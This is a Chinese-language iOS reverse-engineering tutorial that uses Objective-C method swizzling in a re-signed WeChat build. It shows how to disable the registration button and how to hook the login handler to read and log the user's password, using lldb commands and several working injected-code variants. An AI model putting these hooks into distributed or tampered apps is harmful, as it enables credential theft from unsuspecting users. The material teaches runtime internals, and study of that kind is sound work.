本文主要是以WeChat为例,讲解如何破坏WeChat注册、以及如何获取登录密码
引子
在进行WeChat实践操作时,首先需要了解一个概念:Method Swizzing(即方法交换)
Method Swizzing(即方法交换)是利用OC的Runtime特性,动态改变SEL(方法编号)和IMP(方法实现)的对应关系,达到OC方法调用流程改变的目的,主要用于OC方法。
在OC中,SEL和IMP之间的关系,类似与一本书的目录,是一一对应的
SEL:方法编号,类似于目录中的标题IMP:方法实现的真实地址指针,类似于目录中的页码
同时,Runtime中也提供了用于交换两个SEL和IMP的方法,method_exchangeIMP,我们可以通过这个函数交换两个SEL和IMP的对应关系
更为具体的讲解请参考这篇文章:iOS-底层原理 21:Method-Swizzling 方法交换
破坏微信注册
准备工作:需要新建一个工程,并重签名,且采用Framework注入的方式
- 重签名参考文章:iOS逆向 10:应用重签名(下)
- Framework注入方式参考文章:iOS逆向 11:代码注入(上)
这里破坏的微信的注册,主要是通过runtime方法进行注册方法的hook
1、获取注册的相关信息
- 1、通过
lldb调试获取WeChat的注册
2、获取注册的target、action
target:WCAccountLoginControlLogicaction:onFirstViewRegister
2、简单hook演示
- 1、通过
class_getInstanceMethod+method_exchangeImplementations方法,hook注册的点击事件
@implementation inject + (void)load{ // 改变微信的注册 Method oldMethod = class_getInstanceMethod(objc_getClass("WCAccountLoginControlLogic"), @selector(onFirstViewRegister)); Method newMethod = class_getInstanceMethod(self, @selector(my_method)); method_exchangeImplementations(oldMethod, newMethod); } - (void)my_method{ NSLog(@"CJLHook --- 注册不了了!"); } @end
2、重新运行,点击注册按钮,发现执行的是我们自己的方法
3、点击登录时,获取用户的密码
准备工作
- 1、点击登录,输入密码
- 2、点击
Debug View Hierarchy动态调试登录界面 - 3、获取登录按钮信息
target:WCAccountMainLoginViewControlleraction:onNext
- 4、获取密码的类:WCUITextField
方式1:通过lldb获取密码
- llfb获取密码的调试如下
此时问题来了,如果我们想通过hook登录方法,在点击登录按钮时,如何获取密码呢?有以下几种方式
- 1、通过
响应链,一层一层查找,缺点是很繁琐
- 2、
静态分析:可以通过class-dump获取类、方法的列表,其本质也是从Mach-O文件读取出来的
hook登录按钮 - 动态调试获取
- 1、- 在CJLHook的inject类中hook登录按钮的方法
@implementation inject + (void)load{ // 改变微信的注册 Method oldMethod = class_getInstanceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(onNext)); Method newMethod = class_getInstanceMethod(self, @selector(my_onNext)); method_exchangeImplementations(oldMethod, newMethod); } - (void)my_onNext{ } @end
2、通过class_dump工具会dump出OC中类列表(包括成员变量)、方法列表,具体操作如下:
- 1)将class-dump、wechat可执行文件拷贝至同一个文件夹
2)在终端执行以下命令:./class-dump -H WeChat -o ./headers/,其本质是通过读取Mach-O文件获取
3、通过sublime Text打开headers文件夹,在其中查找WCAccountMainLoginViewController类,找到密码的成员变量_textFieldUserPwdItem
查找类文件顺序为:WCAccountTextFieldItem -> WCBaseTextFieldItem -> WCUITextField
动态调试获取-04
4、通过获取的成员变量,利用lldb动态调试获取密码
- po [(WCAccountMainLoginViewController *)0x10a84e800 valueForKey:@"_textFieldUserPwdItem"]
- po [(WCAccountTextFieldItem *)0x281768360 valueForKey:@"m_textField"]
- po ((WCUITextField *)0x10a1566e0).text
hook登录按钮 - hook代码注入方式获取
- 1、修改
my_onNext方法
@implementation inject + (void)load{ // 改变微信的注册 Method oldMethod = class_getInstanceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(onNext)); Method newMethod = class_getInstanceMethod(self, @selector(my_onNext)); method_exchangeImplementations(oldMethod, newMethod); } - (void)my_onNext{ UITextField *pwd = (UITextField *)[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"]; NSLog(@"密码是:%@", pwd.text); } @end
运行结果如下所示
- 2、然后此时需要在my_onNext中调用原来的方法,走回原来的登录流程,此时的
my_onNext方法修改如下
- (void)my_onNext{ UITextField *pwd = (UITextField *)[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"]; NSLog(@"密码是:%@", pwd.text); //调回原来的方法objc_msgSend(WCAccountMainLoginViewController,onNext的IMP) [self my_onNext]; }
3、在[self my_onNext];处加断点,验证此时的my_onNext中的self、_cmd
4、然后继续执行,发现程序会崩溃,即在执行objc_msgSend后会直接崩溃,原因是找不到my_onNext
解决崩溃的方案:添加一个method
- 修改inject中的代码,此时是通过
class_addMethod在WCAccountMainLoginViewController中新增一个方法,然后在和原来的onNext交换新增后的方法
@implementation inject + (void)load{ //原始的method Method oldMethod = class_getInstanceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(onNext)); //给WCAccountMainLoginViewController添加新方法 class_addMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(new_onNext), new_onNext, "v@:"); //获取添加后的方法 Method newMethod = class_getInstanceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(new_onNext)); //交换 method_exchangeImplementations(oldMethod, newMethod); } //新的IMP void new_onNext(id self, SEL _cmd){ UITextField *pwd = (UITextField *)[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"]; NSLog(@"密码是:%@", pwd.text); //调回原来的方法 objc_msgSend(WCAccountMainLoginViewController,onNext的IMP) [self performSelector:@selector(new_onNext)]; } @end
重新运行后查看可以走到原来的登录流程,且同时可以获取用户密码
代码注入优化:通过替换的方式
但是上面的代码看上不并不简洁,所以我们来对其一些优化,采用class_replaceMethod函数进行替换原来的onNext方法,修改后的代码如下
+ (void)load{ //原始的method Method oldMethod = class_getInstanceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(onNext)); //替换 old_onNext = class_replaceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(onNext), new_onNext, "v@:"); } //原来的IMP IMP (*old_onNext)(id self, SEL _cmd); //新的IMP void new_onNext(id self, SEL _cmd){ UITextField *pwd = (UITextField *)[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"]; NSLog(@"密码是:%@", pwd.text); //调回原来的方法 objc_msgSend(WCAccountMainLoginViewController,onNext的IMP) old_onNext(self, _cmd); }
更好的方式
- 通过
method_getImplementation、method_setImplementation方法进行覆盖原来onNext方法的IMP
+ (void)load{ //原始的method old_onNext = method_getImplementation(class_getInstanceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(onNext))); //通过set覆盖原始的IMP method_setImplementation(class_getInstanceMethod(objc_getClass("WCAccountMainLoginViewController"), @selector(onNext)), new_onNext); } //原来的IMP IMP (*old_onNext)(id self, SEL _cmd); //新的IMP void new_onNext(id self, SEL _cmd){ UITextField *pwd = (UITextField *)[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"]; NSLog(@"密码是:%@", pwd.text); //调回原来的方法objc_msgSend(WCAccountMainLoginViewController,onNext的IMP) old_onNext(self, _cmd); }
总结
- Method Swizzing(即方法交换):是利用OC的
Runtime特性,动态改变SEL(方法编号)和IMP(方法实现)的对应关系,达到OC方法调用流程改变的目的
- 多种hook方式:
- 1、
class_addMethod方式: 利用AddMethod方式,让原始方法可以被调用,不至于因为找不到SEL而崩溃 - 2、
class_replaceMethod方式:利用class_replaceMethod,直接给原始的方法替换IMP - 3、
method_setImplementation方式:利用method_setImplementation,直接重新赋值原始的新的IMP
